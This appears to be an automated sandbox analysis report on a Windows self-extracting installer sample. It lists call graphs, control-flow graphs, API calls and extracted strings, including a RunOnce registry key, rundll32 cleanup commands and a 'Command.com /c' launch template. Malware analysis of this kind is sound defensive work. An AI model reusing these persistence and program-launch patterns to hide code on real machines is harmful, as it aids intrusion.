3035->3036 3037 7ff71d1d3557 3035->3037 3040 7ff71d1d356b 3036->3040 3038 7ff71d1d377e GetDesktopWindow 3037->3038 3039 7ff71d1d3567 3037->3039 3041 7ff71d1d4c68 14 API calls 3038->3041 3039->3040 3043 7ff71d1d3635 GetDlgItemTextA 3039->3043 3044 7ff71d1d357b 3039->3044 3042 7ff71d1d3795 SetWindowTextA SendDlgItemMessageA 3041->3042 3042->3040 3045 7ff71d1d37d8 GetDlgItem EnableWindow 3042->3045 3053 7ff71d1d365e 3043->3053 3069 7ff71d1d36e9 3043->3069 3046 7ff71d1d3584 3044->3046 3047 7ff71d1d3618 EndDialog 3044->3047 3045->3040 3046->3040 3048 7ff71d1d3591 LoadStringA 3046->3048 3047->3040 3049 7ff71d1d35bd 3048->3049 3050 7ff71d1d35de 3048->3050 3054 7ff71d1d4dcc 24 API calls 3049->3054 3072 7ff71d1d4a60 LoadLibraryA 3050->3072 3052 7ff71d1d4dcc 24 API calls 3052->3040 3056 7ff71d1d3694 GetFileAttributesA 3053->3056 3053->3069 3071 7ff71d1d35d7 3054->3071 3057 7ff71d1d36a8 3056->3057 3058 7ff71d1d36fa 3056->3058 3060 7ff71d1d4dcc 24 API calls 3057->3060 3062 7ff71d1d7ba8 CharPrevA 3058->3062 3059 7ff71d1d35eb SetDlgItemTextA 3059->3040 3059->3049 3063 7ff71d1d36cb 3060->3063 3061 7ff71d1d374b EndDialog 3061->3040 3064 7ff71d1d370e 3062->3064 3063->3040 3065 7ff71d1d36d4 CreateDirectoryA 3063->3065 3066 7ff71d1d6b70 31 API calls 3064->3066 3065->3058 3065->3069 3067 7ff71d1d3716 3066->3067 3068 7ff71d1d3721 3067->3068 3067->3069 3070 7ff71d1d6ca4 38 API calls 3068->3070 3068->3071 3069->3052 3070->3071 3071->3040 3071->3061 3073 7ff71d1d4c20 3072->3073 3074 7ff71d1d4aa0 GetProcAddress 3072->3074 3078 7ff71d1d4dcc 24 API calls 3073->3078 3075 7ff71d1d4ac2 GetProcAddress 3074->3075 3076 7ff71d1d4c0a FreeLibrary 3074->3076 3075->3076 3077 7ff71d1d4ae2 GetProcAddress 3075->3077 3076->3073 3077->3076 3079 7ff71d1d4b04 3077->3079 3080 7ff71d1d35e3 3078->3080 3081 7ff71d1d4b13 GetTempPathA 3079->3081 3082 7ff71d1d4b65 3079->3082 3080->3040 3080->3059 3083 7ff71d1d4b2b 3081->3083 3086 7ff71d1d4bee FreeLibrary 3082->3086 3083->3083 3084 7ff71d1d4b34 CharPrevA 3083->3084 3084->3082 3085 7ff71d1d4b4e CharPrevA 3084->3085 3085->3082 3086->3080 3087 7ff71d1d78b0 3088 7ff71d1d78fd 3087->3088 3089 7ff71d1d7ba8 CharPrevA 3088->3089 3090 7ff71d1d7935 CreateFileA 3089->3090 3091 7ff71d1d7970 3090->3091 3092 7ff71d1d797e WriteFile 3090->3092 3095 7ff71d1d8470 7 API calls 3091->3095 3093 7ff71d1d79a2 CloseHandle 3092->3093 3093->3091 3096 7ff71d1d79d5 3095->3096 3097 7ff71d1d5870 GlobalAlloc 3098 7ff71d1d33f0 3099 7ff71d1d34ec 3098->3099 3102 7ff71d1d3402 3098->3102 3100 7ff71d1d34f5 SendDlgItemMessageA 3099->3100 3101 7ff71d1d34e5 3099->3101 3100->3101 3103 7ff71d1d340f 3102->3103 3104 7ff71d1d3441 GetDesktopWindow 3102->3104 3103->3101 3105 7ff71d1d3430 EndDialog 3103->3105 3106 7ff71d1d4c68 14 API calls 3104->3106 3105->3101 3107 7ff71d1d3458 6 API calls 3106->3107 3107->3101

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                callgraph 0 Function_00007FF71D1D2244 46 Function_00007FF71D1D7BA8 0->46 79 Function_00007FF71D1D8470 0->79 1 Function_00007FF71D1D66C4 14 Function_00007FF71D1D5050 1->14 19 Function_00007FF71D1D4DCC 1->19 22 Function_00007FF71D1D7AC8 1->22 24 Function_00007FF71D1D6CA4 1->24 1->46 54 Function_00007FF71D1D7700 1->54 69 Function_00007FF71D1D64E4 1->69 1->79 91 Function_00007FF71D1D2468 1->91 2 Function_00007FF71D1D40C4 7 Function_00007FF71D1D473C 2->7 2->14 17 Function_00007FF71D1D114C 2->17 2->19 45 Function_00007FF71D1D1D28 2->45 2->46 48 Function_00007FF71D1D1684 2->48 2->54 2->79 85 Function_00007FF71D1D79F0 2->85 3 Function_00007FF71D1D7C40 4 Function_00007FF71D1D3840 92 Function_00007FF71D1D4C68 4->92 5 Function_00007FF71D1D3B40 6 Function_00007FF71D1D87BC 7->19 30 Function_00007FF71D1D2318 7->30 7->54 7->79 8 Function_00007FF71D1D51BC 8->22 9 Function_00007FF71D1D63B8 9->17 9->46 67 Function_00007FF71D1D1008 9->67 9->79 10 Function_00007FF71D1D2C54 10->19 10->30 33 Function_00007FF71D1D2DB4 10->33 66 Function_00007FF71D1D1C0C 10->66 86 Function_00007FF71D1D61EC 10->86 87 Function_00007FF71D1D30EC 10->87 11 Function_00007FF71D1D8750 12 Function_00007FF71D1D88D0 36 Function_00007FF71D1D8930 12->36 52 Function_00007FF71D1D8880 12->52 13 Function_00007FF71D1D7850 15 Function_00007FF71D1D80D0 29 Function_00007FF71D1D8818 15->29 80 Function_00007FF71D1D8870 15->80 16 Function_00007FF71D1D204C 16->16 16->46 49 Function_00007FF71D1D1084 16->49 16->79 18 Function_00007FF71D1D494C 18->14 18->19 19->17 34 Function_00007FF71D1D7E34 19->34 50 Function_00007FF71D1D7F04 19->50 19->67 19->79 20 Function_00007FF71D1D11CC 20->79 21 Function_00007FF71D1D8648 60 Function_00007FF71D1D8494 21->60 22->19 23 Function_00007FF71D1D60A4 23->14 23->19 23->54 24->19 24->54 59 Function_00007FF71D1D24F8 24->59 24->79 25 Function_00007FF71D1D7024 26 Function_00007FF71D1D33A0 27 Function_00007FF71D1D8A9C 28 Function_00007FF71D1D261C 28->46 28->67 28->79 29->6 30->0 31 Function_00007FF71D1D5B18 32 Function_00007FF71D1D8417 33->14 33->16 33->19 33->22 47 Function_00007FF71D1D70A8 33->47 78 Function_00007FF71D1D3BF4 33->78 33->79 89 Function_00007FF71D1D12EC 33->89 35 Function_00007FF71D1D2834 35->28 37 Function_00007FF71D1D8B30 38 Function_00007FF71D1D81B0 39 Function_00007FF71D1D58B0 39->8 39->31 44 Function_00007FF71D1D512C 39->44 53 Function_00007FF71D1D5380 39->53 58 Function_00007FF71D1D527C 39->58 39->79 82 Function_00007FF71D1D5770 39->82 40 Function_00007FF71D1D4A30 41 Function_00007FF71D1D3530 41->19 41->24 41->46 72 Function_00007FF71D1D4A60 41->72 81 Function_00007FF71D1D6B70 41->81 41->92 42 Function_00007FF71D1D78B0 42->46 42->79 43 Function_00007FF71D1D772C 43->17 43->79 44->49 44->67 45->17 45->19 45->46 45->79 46->49 47->19 47->21 47->25 47->46 47->79 90 Function_00007FF71D1D7D68 47->90 93 Function_00007FF71D1D7CE8 47->93 48->17 48->19 48->46 48->49 48->67 48->79 88 Function_00007FF71D1D2A6C 48->88 48->90 94 Function_00007FF71D1D15E8 48->94 50->79 51 Function_00007FF71D1D8200 51->10 51->12 68 Function_00007FF71D1D8964 51->68 53->19 55 Function_00007FF71D1D1500 55->79 55->92 56 Function_00007FF71D1D7E00 57 Function_00007FF71D1D8802 58->19 58->67 59->17 59->19 59->79 61 Function_00007FF71D1D8790 62 Function_00007FF71D1D8910 63 Function_00007FF71D1D5D90 63->14 63->19 73 Function_00007FF71D1D5C60 63->73 64 Function_00007FF71D1D5690 64->5 65 Function_00007FF71D1D3910 65->5 65->19 65->92 66->19 66->79 69->9 69->24 69->46 69->54 69->79 69->81 70 Function_00007FF71D1D5FE4 70->14 70->19 70->43 71 Function_00007FF71D1D8B60 72->19 72->67 73->53 73->79 73->82 74 Function_00007FF71D1D55E0 75 Function_00007FF71D1D57E0 76 Function_00007FF71D1D8A62 76->27 77 Function_00007FF71D1D3F74 77->14 77->19 77->22 77->54 78->19 78->34 78->35 78->50 78->79 79->60 81->19 81->46 81->54 81->67 83 Function_00007FF71D1D5870 84 Function_00007FF71D1D33F0 84->92 85->46 85->79 86->3 86->16 86->79 87->1 87->2 87->18 87->19 87->22 87->23 87->24 87->30 87->43 87->46 87->54 87->63 87->70 87->77 87->79 88->3 88->67 88->79 89->20 89->79 91->19 91->79 92->79 94->93

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 7ff71d1d40c4-7ff71d1d4116 1 7ff71d1d4118-7ff71d1d4133 call 7ff71d1d5050 0->1 2 7ff71d1d4139-7ff71d1d4141 0->2 1->2 9 7ff71d1d4254-7ff71d1d427d call 7ff71d1d4dcc 1->9 4 7ff71d1d4145-7ff71d1d4167 memset 2->4 6 7ff71d1d4282-7ff71d1d4295 4->6 7 7ff71d1d416d-7ff71d1d4188 call 7ff71d1d5050 4->7 8 7ff71d1d4299-7ff71d1d42a3 6->8 7->9 18 7ff71d1d418e-7ff71d1d4194 7->18 12 7ff71d1d42a5-7ff71d1d42ab 8->12 13 7ff71d1d42b7-7ff71d1d42c2 8->13 19 7ff71d1d44ee 9->19 12->13 16 7ff71d1d42ad-7ff71d1d42b5 12->16 17 7ff71d1d42c5-7ff71d1d42c8 13->17 16->8 16->13 20 7ff71d1d4328-7ff71d1d433d call 7ff71d1d1684 17->20 21 7ff71d1d42ca-7ff71d1d42e2 call 7ff71d1d5050 17->21 22 7ff71d1d4196-7ff71d1d419b 18->22 23 7ff71d1d419d-7ff71d1d41a0 18->23 28 7ff71d1d44f0-7ff71d1d451f call 7ff71d1d8470 19->28 20->19 35 7ff71d1d4343-7ff71d1d434a 20->35 21->9 38 7ff71d1d42e8-7ff71d1d42ef 21->38 24 7ff71d1d41b5 22->24 25 7ff71d1d41a2-7ff71d1d41ab 23->25 26 7ff71d1d41ad-7ff71d1d41af 23->26 31 7ff71d1d41b8-7ff71d1d41bb 24->31 25->24 30 7ff71d1d41b1 26->30 26->31 30->24 31->17 36 7ff71d1d41c1-7ff71d1d41cb 31->36 41 7ff71d1d434c-7ff71d1d4353 35->41 42 7ff71d1d436a-7ff71d1d436c 35->42 43 7ff71d1d4231-7ff71d1d4234 36->43 44 7ff71d1d41cd-7ff71d1d41d0 36->44 39 7ff71d1d42f5-7ff71d1d4322 CompareStringA 38->39 40 7ff71d1d45d8-7ff71d1d45df 38->40 39->20 39->40 49 7ff71d1d45e5-7ff71d1d45ec 40->49 50 7ff71d1d472d-7ff71d1d472f 40->50 41->42 46 7ff71d1d4355-7ff71d1d435c 41->46 51 7ff71d1d4493-7ff71d1d449b 42->51 52 7ff71d1d4372-7ff71d1d4379 42->52 43->20 45 7ff71d1d423a-7ff71d1d4252 call 7ff71d1d5050 43->45 47 7ff71d1d41d2-7ff71d1d41d9 44->47 48 7ff71d1d41db-7ff71d1d41dd 44->48 45->9 45->17 46->42 56 7ff71d1d435e-7ff71d1d4360 46->56 57 7ff71d1d41ea-7ff71d1d41fb call 7ff71d1d5050 47->57 48->19 58 7ff71d1d41e3 48->58 49->50 59 7ff71d1d45f2-7ff71d1d4621 RegOpenKeyExA 49->59 50->28 54 7ff71d1d44df-7ff71d1d44e9 LocalFree 51->54 55 7ff71d1d449d-7ff71d1d44a4 call 7ff71d1d473c 51->55 60 7ff71d1d437f-7ff71d1d4381 52->60 61 7ff71d1d4599-7ff71d1d45d3 call 7ff71d1d4dcc LocalFree 52->61 54->19 69 7ff71d1d44a9-7ff71d1d44ab 55->69 56->52 65 7ff71d1d4362-7ff71d1d4365 call 7ff71d1d1d28 56->65 57->9 79 7ff71d1d41fd-7ff71d1d422d CompareStringA 57->79 58->57 59->50 66 7ff71d1d4627-7ff71d1d4666 RegQueryValueExA 59->66 60->51 68 7ff71d1d4387-7ff71d1d438e 60->68 61->19 65->42 72 7ff71d1d471c-7ff71d1d4728 RegCloseKey 66->72 73 7ff71d1d466c-7ff71d1d469b memset GetSystemDirectoryA 66->73 68->51 75 7ff71d1d4394-7ff71d1d439f call 7ff71d1d79f0 68->75 69->54 76 7ff71d1d44ad-7ff71d1d44c3 LocalFree 69->76 72->50 77 7ff71d1d46b3-7ff71d1d46dc call 7ff71d1d114c 73->77 78 7ff71d1d469d-7ff71d1d46ae call 7ff71d1d7ba8 73->78 86 7ff71d1d4574-7ff71d1d4597 call 7ff71d1d4dcc 75->86 87 7ff71d1d43a5-7ff71d1d43c1 GetProcAddress 75->87 76->40 83 7ff71d1d44c9-7ff71d1d44ce 76->83 88 7ff71d1d46e3-7ff71d1d46ea 77->88 78->77 79->43 83->4 99 7ff71d1d4553-7ff71d1d456f LocalFree call 7ff71d1d7700 86->99 89 7ff71d1d4521-7ff71d1d454e call 7ff71d1d4dcc FreeLibrary 87->89 90 7ff71d1d43c7-7ff71d1d4415 87->90 88->88 92 7ff71d1d46ec-7ff71d1d4717 RegSetValueExA 88->92 89->99 93 7ff71d1d441f-7ff71d1d4427 90->93 94 7ff71d1d4417-7ff71d1d441b 90->94 92->72 97 7ff71d1d4431-7ff71d1d4433 93->97 98 7ff71d1d4429-7ff71d1d442d 93->98 94->93 102 7ff71d1d4435-7ff71d1d4439 97->102 103 7ff71d1d443d-7ff71d1d4445 97->103 98->97 99->19 102->103 105 7ff71d1d444f-7ff71d1d4451 103->105 106 7ff71d1d4447-7ff71d1d444b 103->106 107 7ff71d1d4453-7ff71d1d4457 105->107 108 7ff71d1d445b-7ff71d1d447e 105->108 106->105 107->108 110 7ff71d1d44d3-7ff71d1d44da FreeLibrary 108->110 111 7ff71d1d4480-7ff71d1d4491 FreeLibrary 108->111 110->54 111->76
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$horseradish$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                • API String ID: 2679723528-2543813906
                                • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                • Instruction ID: 395df5a64739b71c06a614f803766e84c8a3f589c326cb0c09f4998bc742e069
                                • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                • Instruction Fuzzy Hash: D9026071A4CE4386FB20AB14B8681B9B7A1FB89764FD60135DA4D42654EF3CE54CEF20

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                • API String ID: 178549006-607953301
                                • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                • Instruction ID: 1263b7ca9c8a707597055ad4ed96d482636eb67696dca2df7b44c66bfe46e3b3
                                • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                • Instruction Fuzzy Hash: 51815E72A0CE4296FB10AB11F8682B9F7A2FB89B64F865231D94D43754EF3CD149DB10

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 144 7ff71d1d1684-7ff71d1d16ce 145 7ff71d1d16d3-7ff71d1d16dd 144->145 146 7ff71d1d16df-7ff71d1d16e5 145->146 147 7ff71d1d16f2-7ff71d1d1704 145->147 146->147 150 7ff71d1d16e7-7ff71d1d16f0 146->150 148 7ff71d1d1713-7ff71d1d171a 147->148 149 7ff71d1d1706-7ff71d1d1711 147->149 151 7ff71d1d171e-7ff71d1d173c call 7ff71d1d15e8 148->151 149->151 150->145 150->147 154 7ff71d1d173e 151->154 155 7ff71d1d17aa-7ff71d1d17c2 151->155 157 7ff71d1d1741-7ff71d1d1748 154->157 156 7ff71d1d17c7-7ff71d1d17d1 155->156 158 7ff71d1d17d3-7ff71d1d17d9 156->158 159 7ff71d1d17e6-7ff71d1d17ff call 7ff71d1d7ba8 156->159 157->157 160 7ff71d1d174a-7ff71d1d174e 157->160 158->159 161 7ff71d1d17db-7ff71d1d17e4 158->161 164 7ff71d1d1804-7ff71d1d1814 call 7ff71d1d7d68 159->164 160->155 163 7ff71d1d1750-7ff71d1d1757 160->163 161->156 161->159 165 7ff71d1d175e-7ff71d1d1760 163->165 166 7ff71d1d1759-7ff71d1d175c 163->166 172 7ff71d1d1a1b-7ff71d1d1a2b call 7ff71d1d7d68 164->172 173 7ff71d1d181a-7ff71d1d1847 CompareStringA 164->173 165->155 169 7ff71d1d1762-7ff71d1d1764 165->169 166->165 168 7ff71d1d1766-7ff71d1d1776 166->168 171 7ff71d1d177b-7ff71d1d1785 168->171 169->155 169->168 174 7ff71d1d1787-7ff71d1d178d 171->174 175 7ff71d1d179a-7ff71d1d17a8 171->175 183 7ff71d1d1a31-7ff71d1d1a5e CompareStringA 172->183 184 7ff71d1d1acb-7ff71d1d1ae9 LocalAlloc 172->184 173->172 177 7ff71d1d184d-7ff71d1d1861 GetFileAttributesA 173->177 174->175 178 7ff71d1d178f-7ff71d1d1798 174->178 175->164 180 7ff71d1d19f3-7ff71d1d19fb 177->180 181 7ff71d1d1867-7ff71d1d186f 177->181 178->171 178->175 182 7ff71d1d1a00-7ff71d1d1a16 call 7ff71d1d4dcc 180->182 181->180 185 7ff71d1d1875-7ff71d1d1891 call 7ff71d1d15e8 181->185 198 7ff71d1d1bda-7ff71d1d1c03 call 7ff71d1d8470 182->198 183->184 189 7ff71d1d1a60-7ff71d1d1a67 183->189 187 7ff71d1d1aa2-7ff71d1d1aad 184->187 188 7ff71d1d1aeb-7ff71d1d1aff GetFileAttributesA 184->188 196 7ff71d1d1893-7ff71d1d18b0 call 7ff71d1d15e8 185->196 197 7ff71d1d18b5-7ff71d1d18d1 LocalAlloc 185->197 187->182 192 7ff71d1d1b01-7ff71d1d1b03 188->192 193 7ff71d1d1b7e-7ff71d1d1b88 188->193 194 7ff71d1d1a6a-7ff71d1d1a71 189->194 192->193 199 7ff71d1d1b05-7ff71d1d1b16 192->199 201 7ff71d1d1b8f-7ff71d1d1b99 193->201 194->194 200 7ff71d1d1a73 194->200 196->197 197->187 205 7ff71d1d18d7-7ff71d1d194d GetPrivateProfileIntA GetPrivateProfileStringA 197->205 206 7ff71d1d1b1d-7ff71d1d1b27 199->206 208 7ff71d1d1a78-7ff71d1d1a7f 200->208 202 7ff71d1d1b9b-7ff71d1d1ba1 201->202 203 7ff71d1d1bae-7ff71d1d1bb9 201->203 202->203 209 7ff71d1d1ba3-7ff71d1d1bac 202->209 210 7ff71d1d1bbc-7ff71d1d1bcc call 7ff71d1d2a6c 203->210 211 7ff71d1d1984-7ff71d1d1993 205->211 212 7ff71d1d194f-7ff71d1d197f call 7ff71d1d1008 * 2 205->212 213 7ff71d1d1b3c-7ff71d1d1b4d 206->213 214 7ff71d1d1b29-7ff71d1d1b2f 206->214 208->208 216 7ff71d1d1a81-7ff71d1d1aa0 LocalAlloc 208->216 209->201 209->203 224 7ff71d1d1bd1-7ff71d1d1bd5 210->224 221 7ff71d1d1995-7ff71d1d19b8 GetShortPathNameA 211->221 222 7ff71d1d19ba 211->222 212->224 213->210 220 7ff71d1d1b4f-7ff71d1d1b52 213->220 214->213 219 7ff71d1d1b31-7ff71d1d1b3a 214->219 216->187 223 7ff71d1d1ab2-7ff71d1d1ac6 call 7ff71d1d114c 216->223 219->206 219->213 220->210 226 7ff71d1d1b54-7ff71d1d1b7c call 7ff71d1d1084 * 2 220->226 227 7ff71d1d19c1-7ff71d1d19ee call 7ff71d1d114c 221->227 222->227 223->224 224->198 226->210 227->224
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                • API String ID: 383838535-3614570713
                                • Opcode ID: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                • Instruction ID: d90fb71e3b1683e03503dd821619f5523b2b58e5387fd7249959590ea17780a5
                                • Opcode Fuzzy Hash: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                • Instruction Fuzzy Hash: A5E1AF62A0CE8385FB11AF10B4282BAA7A2EB45764FD54231DA4D03795EF3DD58DDB20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 238 7ff71d1d66c4-7ff71d1d6724 call 7ff71d1d5050 LocalAlloc 241 7ff71d1d6756-7ff71d1d676a call 7ff71d1d5050 238->241 242 7ff71d1d6726-7ff71d1d6749 call 7ff71d1d4dcc call 7ff71d1d7700 238->242 247 7ff71d1d67a5-7ff71d1d67ea lstrcmpA LocalFree 241->247 248 7ff71d1d676c-7ff71d1d67a3 call 7ff71d1d4dcc LocalFree 241->248 259 7ff71d1d674f-7ff71d1d6751 242->259 251 7ff71d1d67ec-7ff71d1d67ee 247->251 252 7ff71d1d6837-7ff71d1d683d 247->252 248->259 257 7ff71d1d67f0-7ff71d1d67f9 251->257 258 7ff71d1d67fb 251->258 254 7ff71d1d6843-7ff71d1d6849 252->254 255 7ff71d1d6b14-7ff71d1d6b38 call 7ff71d1d7ac8 252->255 254->255 262 7ff71d1d684f-7ff71d1d6870 GetTempPathA 254->262 261 7ff71d1d6b3a-7ff71d1d6b66 call 7ff71d1d8470 255->261 257->258 263 7ff71d1d67fe-7ff71d1d680e call 7ff71d1d64e4 257->263 258->263 259->261 266 7ff71d1d6872-7ff71d1d687e call 7ff71d1d64e4 262->266 267 7ff71d1d68ad-7ff71d1d68b9 262->267 274 7ff71d1d6814-7ff71d1d6832 call 7ff71d1d4dcc 263->274 275 7ff71d1d6b0f-7ff71d1d6b12 263->275 273 7ff71d1d6883-7ff71d1d6885 266->273 272 7ff71d1d68bc-7ff71d1d68bf 267->272 276 7ff71d1d68c4-7ff71d1d68ce 272->276 273->275 277 7ff71d1d688b-7ff71d1d6895 call 7ff71d1d2468 273->277 274->259 275->261 279 7ff71d1d68d0-7ff71d1d68d5 276->279 280 7ff71d1d68e1-7ff71d1d68f3 276->280 277->267 292 7ff71d1d6897-7ff71d1d68a7 call 7ff71d1d64e4 277->292 279->280 281 7ff71d1d68d7-7ff71d1d68df 279->281 282 7ff71d1d6adb-7ff71d1d6b04 GetWindowsDirectoryA call 7ff71d1d6ca4 280->282 283 7ff71d1d68f9-7ff71d1d690f GetDriveTypeA 280->283 281->276 281->280 282->259 297 7ff71d1d6b0a 282->297 286 7ff71d1d6916-7ff71d1d692a GetFileAttributesA 283->286 287 7ff71d1d6911-7ff71d1d6914 283->287 290 7ff71d1d6930-7ff71d1d6933 286->290 291 7ff71d1d69bd-7ff71d1d69d0 call 7ff71d1d6ca4 286->291 287->286 287->290 294 7ff71d1d6935-7ff71d1d693f 290->294 295 7ff71d1d69ad 290->295 303 7ff71d1d69f4-7ff71d1d6a00 call 7ff71d1d2468 291->303 304 7ff71d1d69d2-7ff71d1d69de call 7ff71d1d2468 291->304 292->267 292->275 299 7ff71d1d69b1-7ff71d1d69b8 294->299 300 7ff71d1d6941-7ff71d1d6953 294->300 295->299 297->272 306 7ff71d1d6ad2-7ff71d1d6ad5 299->306 300->299 305 7ff71d1d6955-7ff71d1d6981 GetDiskFreeSpaceA 300->305 314 7ff71d1d6a16-7ff71d1d6a3e call 7ff71d1d7ba8 GetFileAttributesA 303->314 315 7ff71d1d6a02-7ff71d1d6a11 GetWindowsDirectoryA 303->315 304->295 313 7ff71d1d69e0-7ff71d1d69f2 call 7ff71d1d6ca4 304->313 305->295 309 7ff71d1d6983-7ff71d1d69a4 MulDiv 305->309 306->282 306->283 309->295 312 7ff71d1d69a6-7ff71d1d69ab 309->312 312->291 312->295 313->295 313->303 320 7ff71d1d6a55 314->320 321 7ff71d1d6a40-7ff71d1d6a53 CreateDirectoryA 314->321 315->314 322 7ff71d1d6a58-7ff71d1d6a5a 320->322 321->322 323 7ff71d1d6a5c-7ff71d1d6a6b 322->323 324 7ff71d1d6a6d-7ff71d1d6a8e SetFileAttributesA 322->324 323->306 325 7ff71d1d6a91-7ff71d1d6a9b 324->325 326 7ff71d1d6aaf-7ff71d1d6acc call 7ff71d1d64e4 325->326 327 7ff71d1d6a9d-7ff71d1d6aa3 325->327 326->275 331 7ff71d1d6ace 326->331 327->326 328 7ff71d1d6aa5-7ff71d1d6aad 327->328 328->325 328->326 331->306
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                • API String ID: 3973824516-1370313076
                                • Opcode ID: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                • Instruction ID: 28e61e40518e2d20314203c36ef9542195792042bca677ec788002d34e3c9fec
                                • Opcode Fuzzy Hash: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                • Instruction Fuzzy Hash: E4D1A32261CE8786FB10AB10B4682BAE7A1FB85760FD24535DA4D43695EF3DE40DDF20

                                Control-flow Graph

                                • Executed
                                • Not Executed
